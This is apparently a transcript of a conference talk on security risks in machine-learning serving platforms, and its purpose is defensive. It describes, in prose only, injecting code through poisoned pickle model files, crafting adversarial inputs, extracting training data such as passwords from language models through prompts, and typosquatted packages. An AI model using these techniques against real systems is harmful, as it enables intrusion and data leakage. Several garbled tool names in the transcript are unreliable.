 Thank you, Ed. Yeah, so my name is Adrian Gonzalez-Martin. I'm a machine learning engineer at Teldon. I'm also a fellow of the City of Forestry called AI NML. And what we're gonna be talking today about is about security challenges that we generally face in machine learning and in the ML apps space. And this is a space that we haven't dive much into it so far. It's a space that is very well researched in the DevOps area, for example, but not in the machine learning space. It's probably gonna be the next frontier, something that we need to start thinking about because now we are starting to have these massive ML apps platforms. We know how to tackle a few problems. We have a lot of tools, but we haven't looked much into how these, like the attack surface that these exposes and how to cover that. With anything related to ML apps, it provides a new set of challenges that were not present there before with DevOps. And just to clarify, we're gonna see some examples and we're gonna see some technical solutions. However, at the end of the day, all of these solutions, the focus is, the only way to solve this, most of these problems, is relying on humans, relying on processes. Which is again something that was the same thing in the DevOps space, right? It's all about getting everyone to talk and getting everyone to work together. And if we see about, so extending from that, following up from that, what we like to talk about is about ML tech ops. So, which is the natural extension of tech ops to the ML ops space. And this is like, it combines several disciplines. So you have like a bit of DevOps, you have things about tech ops. You have things about ML ops. And if we want to look at solutions in this area, like how we solve this, we can always just go back to the DevOps book, take some pages from it, see what was done there in the area in order to nail tech ops on like, guess, classic DevOps. And if we look at what was done there, we can see for example, the OWASP top 10 of vulnerabilities. And this is essentially, so OWASP is this institution that publishes, well, it does a lot of things. One of the things it does is it publishes this top 10 assessment of the most common vulnerabilities that we can see in web systems, mainly web applications. One of the cool things about OWASP is that the target audience of OWASP is now security researchers. So security researchers are the one building this list. But the target audience is actual practitioners. So you, but it's so many years and gets more DevOps people. And it's one of these, also something interesting is that some of these are targeted directly to them, so things that they can have control over, things that they can apply to their own products, both for engineers. Some of them apply more for engineers, software engineers, other ones for DevOps like security systems, having proper access control, et cetera. What we are gonna see doing this talk is how we can build a similar list, but for machine learning systems, for ML ops platforms, and how that also will extend naturally. It's also like data scientists and the work that they do. Not sure many of you may not be familiar with this slide, but this is essentially like, there is, across the board, there is an interest in securing ML ops systems. And this is like the list of principles that the LFI published for trusted AI. Like there are a few, these are like things that would be really nice to have in any machine learning system. One of them is security. The problem is that we don't even quite know what that means. And that's why we started this working group defining what would be like the best practices for the end to secure the end to the machine learning lifecycle. And this is like, so taking back the slide from the keynote, this is how like a whole end to end machine learning system kind of would look like. And as you can see, like you have a security risk. There's an attack surface on every component. Now, today we only have 30 minutes, maybe less, maybe 1,000 questions. So we are not gonna be able to focus on everything. What we're gonna do instead is just focus on the serving aspect on the last row of that diagram. And just to ensure all of us are in the same page, what we mean by the last stage, by the deployment stage, serving stage. What we generally have in ML ops systems is you, so the data scientist would usually provide either a set of model weights that is essentially the binary artifact, the binary output from training their model, or sometimes data scientist or sometimes machine learning engineers or software engineers would provide a custom, some piece of custom code, some kind of custom inference server that knows how to run their models. Or maybe sometimes both of them. Once you have that, you just deploy that. And what do we have when we deploy that? What we usually have is some sort of inference server running that custom set of model weights that you got. Or an OR, a bit of custom code, which is the glue code that is relevant for your use case. We just know how to load this block and how to perform inference with this block. And through the talk, we're gonna run a few examples of how the security services can be exposed. So the first thing that we are gonna do is to deploy a model on our test cluster, test Kubernetes cluster, and just see how that looks like. So what I'm gonna do is, and as soon as you can all see that correctly, probably it's a bit too, it'll be a bit hard this way. So I'm probably just gonna see it now. All right, so what we generally would have is a, so this would be like first, like the training stage, we're gonna run through that very quickly. You would have some sort of requirements. You would just install those. You would train a secular model. In this case, simple example. You can see that you can run predictions with it. And what you would do next is just serialize it. And frameworks like Cyclylearn, the recommended approach to serializing it is actually to just use something like Joplip, which is pickling the things, essentially. And we're gonna talk more about pickles now. But the binary artifact, it looks something like that. It's like a big block of things. You can recognize some things, but most things don't make any sense. So once we have that on our cluster, we're gonna have MIGIO running. That's where we're gonna store our artifacts and we're gonna copy the artifact to MIGIO. And then we're gonna deploy it. I think in this case, we're gonna deploy it with Seldom Core. It doesn't matter. Generally, like any kind of serving engine would do the same thing. You have some artifact and you deploy it to your cluster. Which in the end, when you deploy that, what you're gonna get is a set of pods that are running there. And again, sorry if maybe, I think the outputs are there. It's not, I can't see very well what's in there. So hopefully what I'm saying makes sense. Once we have that in there, we can then send requests and we can see there how we just, we send like a, I think a NumPy tensor. We encode that to the V2 protocol, which is the protocol that, in this case, Seldom Core speaks. And we get the response back. And when we decode it, it's like an app array. So it's all looking good. If I can just, just like here again. I guess I'm gonna need to move this right here. So we now have our model deployed. And let's look at what security risk areas we can see there. So we're gonna start with the first one. So we talk briefly, we mentioned pickles. We are picking our artifacts. Pickles, for those of you who may not be familiar with it, are it's like Python's native way of serializing any custom, any code object in Python. So it could be classes, it could be functions, it could be dictionaries, it could be anything. What this means is that when you unload the pickle, you can run any arbitrary code, anything. So one, one risk area is, okay, what happens if an attacker somehow gets access to this pickle? They can run anything they want. And we're gonna see a quick example. Let me just move this over again, very quickly. Right. Yeah, so what we are gonna do is, hopefully it shows in the screen, what we're gonna do is just to tweak the model that we tried to serialize to inject a poison reduce function, which is essentially the function that pickle is gonna use. And what we're gonna do with that is ensure that when the model gets serialized, it gets serialized as a system code. And in this case, what it's gonna do is dump the environment variables of that pod where the model is running. So we can, so we do that here. And when we, so then the blob changes, the pickle changes, but it's again like a big blob, like a binary blob, it's very hard to see what's going on there. So we load that to Minio, we deploy our new unsafe model. And if we look, so if we were to exec into that model, into that pod, we would see that in fact, it created that like found file with all the environment variables running there. So same as this, you can run anything like you have full access. So let me now just move back to the slides. What's this here? All right, perfect. So pickles are super widespread in machine learning frameworks and machine learning library. So we see, for example, here a couple of examples. So we talk about scikit-learn, that's what the docs recommend to just pickle your artifact. Torch by torch also uses pickles. Again, another potential attack surface to do anything that you want. Keras as well uses pickles. Everything uses pickles. And as you can see, it's like giving a wide door to your cluster to do anything you want. It's very hard to scan pickles to see whether they are malicious or not. So this is mainly like a trust or discard problem. So we need to ensure, so like the kind of solution here would be to ensure that there is some trust between all the supply chain steps. So here we will talk about like signing the artifacts and ensuring they come from the right place from someone who we trust and that they haven't been poisoned along the way. Now, next security risk area. We're gonna talk about what's the problem when you give access to your model. So generally like in web applications, when you give access to the model, like the main thing that you can do, like the worst thing that you can do is that someone who is not authorized may create the wrong user access, the wrong user details, et cetera. Here the problem is that it doesn't stop just at that. So let's say you have an inference endpoint. Exposing an inference endpoint without any control sincerely gives any attacker access to, it's still a black box, but even with just a black box, they can learn a lot about your model. And one thing that they can learn is how to create adversarial attacks. So for example here, I don't know if many of you are familiar with adversarial attacks, you can see some examples there on the right of how, so the images on the left-hand side column are the original images and then the images on the right-hand side column are the poison images, let's say. So they are images with very small tweaks that are not perceptible to a human eye but are enough to change completely the prediction that the model is gonna make. If you expose your model and you leave that black box wide open and wide accessible, an attacker could learn how to craft these things and could basically just turn any machine learning system unusable because it would be able to tweak it. So in the MLF space, it's not just about authorizing who has access to something, it's also about authorizing the payload itself. How can we do that? So there are tools like AlibiDetect that provide detectors. So you have the ability to create a detector that has been trained to detect potential adversarial attacks and to say, okay, don't trust this payload. Like, it looks fine, it's completely like, it's well-formed, everything is okay, but this may be someone who's trying to get access to learn more about their model or to learn how to craft adversarial attacks. And once we know that, we can react accordingly. Like, we can say, okay, just don't forward that to the model, just log it or wherever you want. There is a second step of access which would be like white box access. So before we were talking about how like, if a user were to gain right access to our model store, they could just inject like a poison pickle and half full access to the cluster. However, even if they can just read this model artifact, they can still learn a lot of things about your model. They can leak some of the training data, they can do so many things. And one of the interesting things is that we know that they can do many things, but we don't even know how far this can go because at the same time as we don't know how to secure systems because they are not as widespread, they have also not been that many attacks yet, but we know it's a wide door open. Going further, a user, and this is something this is from our real paper, you can even use models to leak some of the training data. So for example, you know generative models, they are pretty trendy like large language models that can generate text based on a prompt. So users were tested, some researchers were testing this out and they found out that for example, you can set a prompt like user, this name, password. And the model will just leak the password that user. Because it has learned to generate that data. Same thing with addresses, same thing with names. There were like a bunch of personal details that could just get leaked and beat snippets from the training data set, that could just get extracted verb team. So now so far, we have talked about the model artifact, we have talked about the model. If we continue going down to the infra level, the next step would be the custom code that you execute. So we talked before about how generally data scientists would deploy a model artifact or maybe you have machine learning engineers that would just provide a custom inference runtime that runs in your pod. When you provide custom code, and when you use dependencies, we'll talk about dependencies later, but when you run custom code, you have the risk of introducing vulnerabilities. A good thing here is that now we are getting more into the classic DevOps space where there is a lot more tooling, there are a lot more things around. So for code vulnerabilities, we have a few like static analyzers that can tell us, well, this code probably has some vulnerabilities. But even in dependencies, like it can still be an issue. Like for example, here's an example from TensorFlow where it gives you white access to load any kind of jammer. And again, jammer is a bit like p-codes in a way. If done in the wrong way, you can also let an attacker run any arbitrary code. In generally like jammer libraries, we have like a low jammer function, a safe low jammer function that kind of strips these things out. There are again like tools like the GitHub built-in code scanner tool. There are all the tools like Bandit that we can use. In general, the good thing is, okay, there are tools we can use them. However, when we talk about MLops, we probably also have notebooks, right? Like data scientists will maybe use notebooks and notebooks also have code. And here's where it becomes a bit muddier. Like how can you, like we have tools to do a static analysis on like a normal code base, but how do you ensure that in a notebook? A notebook which is not linear, it's using no extra context, what extra state it may have. Things are starting to get a bit muddier. This is where you kind of get to the edge of what's out there, what things you can use, what things you can automate. Now dependencies, so we talked previously about dependencies. For example, we saw that TensorFlow issue that introduced like a security risk. In general, well, this is more of a Python problem, but in general, dependencies are hard. Even like if it's not Python, Fisca or anything else, dependencies are still hard. Any kind of dependency that you trust, even if you trust it, can introduce some security risk. The problem is that is like, you can track the first level of dependencies, but then you need to think about the second level, the third level, and that's where the problems may come in. And this is where issues may come in. So for example, we see here like a few examples of how like when you don't have any kind of control or what you're installed, you may run into issues. And here also, like these are some famous examples. There are even more exotic ones, more historic ones. So for example, we go back, so you can see here like we installed scikit-learn, okay. There was these security researchers who tried to say, well, a lot of people may include a typo when they install pip install, when they say pip install scikit-learn, maybe instead of saying type in scikit-learn, they may type like sciki sklearn. All right, like they're switching to learners. And he said, well, what happens if I publish a package with that name? And because pip also gives you control, pips lets you execute any kind of code when you install it, what happens if I put there a vulnerability? And of course, everyone typing the wrong package name got that. So I don't remember the numbers, but like the attack was a massive success. He wasn't trying to do any harm, so all the attacks were harmless, but it showed that even just a random thing is going to introduce a lot of security risks. Probably gonna skip this example in the interest of time, but basically I was a bit, to show how bad this problem can get, and how bad like that. So using our requirements, we installed like four packages, I think, five packages. Those five packages introduced like, in total it was like, I think 50 or more dependencies, which are like second, third, four level dependencies. Some of these we have no control over. The solution here is generally to use more log files, which is something that older languages use, Python doesn't that much. Now there are starting to appear tools that do that. So for example, poetry, that kind of allows you control that. Going forward though, still in the dependencies world, generally, yeah, like the flow will go like as you saw, like you have like the data scientist in this case, we just have a local requirements TXT, we installed a few things, and that's it, and during their model, et cetera. However, packages like tools like MSflow, in order to make, in order to let the data scientist also pack it up, what these dependencies look like, like what these versions should look like. MSflow, when you look at model, also looks like a conda.jammel file, but basically, which basically says how the environment should look like. This is just a way for the scientists to have control over like the versions of the packages they use. That's pretty cool, but what that means is that, then when you move to production, when you deploy that model, the set of dependencies will get installed dynamically, which means you now have like more issues, because it's not like you have like this previous static set of dependencies that you installed, and you're adding a Docker file. No, now what you have is a dynamic set of dependencies that is coming from your model storage. A solution for this, for example, something that as part of the ML server project, something that we have been collaborating on with MSflow is kind of like, well, how can we preview this environment so that we just don't do like random, or like that dynamic installation when we deploy models? But yeah, again, going back to the main thread, so dependencies, again, they are not as much of an ML of specific problem, they are again a DevOps problem, but one that we need to think about, but what that means is that we have a lot of tools that we can use to detect TV, detect vulnerabilities, et cetera. So for example, Dependabot, or Dependency Check Safety, these are tools that will check for CBEs in your dependencies, and that will flag when something is not secure. Even PIP has issues, so it's not just even dependencies, it's also like what system package managers are using. Which kind of leads now into like the next level. So now we have, so we have looked at the model artifact, we have looked at the custom runtime, with your custom code, we have looked at the dependencies. Now let's look at where does the dependencies run, where all of that runs, which generally if you are not a crazy person, will be some sort of Docker image. Docker images are essentially operating systems inside, so you also have the same kind of vulnerabilities that you will get in a regular computer, like now instead of having the vulnerabilities in cycle, you will have vulnerabilities in some kind of, like VIM, you got to have vulnerability in VIM. But again, this is also part of the classic DevOps world, which means there are tools you can use to automate your scans. For example, in Seldom Core, the Seldom Core project we use, and the MSR project we use SNIC, which is a, yeah, social sponsor, and it's a tool that just lets you run automated scans every time you change anything. There are others, like 3B by AquaScan, there are a few of them. And then going down an extra layer, you now have to think about the classical security risk that you would get at the infrastructure level. And here would be more things like RBAC, would be things like MTLS, like classical things that you would need to think about Kubernetes. And we are not gonna dive too much into this one, but because it's a massive topic, just today actually there was a whole co-located event that was just about security. So yeah, probably like if you want to learn more about this one, I would take those talks or I guess we'll be in YouTube soon, or probably there will be like some other talks from the main KubeCon event about security. Yeah, I know, right? Like we have seen a lot of security risk areas. Things look quite bad. What do we do about that? So if we were to go through all these different vulnerabilities that we saw, we would be able to recreate something similar to the old Wasp Top 10 that we talked about initially, but for the ML Apps space. So instead of broken access control, you would have like unrestricted model endpoints. So it's like access to your model as a black box. Instead of cryptographic failures, you would have access to the actual model artifacts, which is where you could poison pickles. You could have access to your model as a white box. So with full transparency of what's going on there. And so on and so forth. And again, as in old Wasp, the focus here, the good thing about this list, which covers some of the risk that we have seen, is that the target audience, like the focus, so the responsibilities of securing into quantities of these steps of preventing these risk areas are split between, some of them would be the data scientist, some of them would be the machine learning engineer, the software engineer, some of them would be responsibility to the DevOps expert, which means we can leverage that, or we can, and here's where like the added value of platforms come in. We could ensure, we can build platforms that ensure that these things are built into our machine learning systems. And some of them what we will involve is essentially just leveraging developer platforms to have single entry points, single entry points to each one of the steps, so that you don't just give like a Kubernetes cluster to the data scientist and say, okay, deploy your models. Instead of that, you give them a platform, you give them an abstraction that has built in all these automations. What that allows you is to let each one of the pieces of the puzzle be responsible of their own scope. So for example, the DevOps engineer here would be the one securing that the Kubernetes platform where we are deploying our models has an MTLS, the endpoints are restricted, et cetera, et cetera. Or that the software engineer or machine learning engineer that is building our custom runtimes has control over or has just like a few endpoints to deploy these custom runtimes, which then would trigger like the automated scans, automated dependency scans, pre-building any dependencies, et cetera. And same thing with the data scientist. Let's just give them a single entry point to provide their terrain artifact, which would allow us to then run, kick off like any scans on the Picoes, like sign text, et cetera, et cetera. Going further, we can even create automations, create tooling for data scientists, et cetera, to have the security built in by the science. So for example, something that we have been working on is having a set of templates that have all these best practices, like code scans, dependency logs, et cetera, built into. So for example, within the ML server CLI, you can have the ML server in it. Oh, that's wrong, actually. So the ML server in it, and it would create a project template with all these things built into it. If you are interested to learn more about this, we have now kick started. There is now a new working group, it's part of the CNCF called ML SCOPS working group. You can see the details there of when we joined to discuss, talk about these things, talk about best practices. The key goals here would be, for example, to finalize these set of top-temple vulnerabilities, something setting a stone, and going forward to kind of, yeah, set security standards, et cetera. Fine, for the resources for the talk, you can find the links on the deck, and that's it, yeah. That's all we have. Thank you.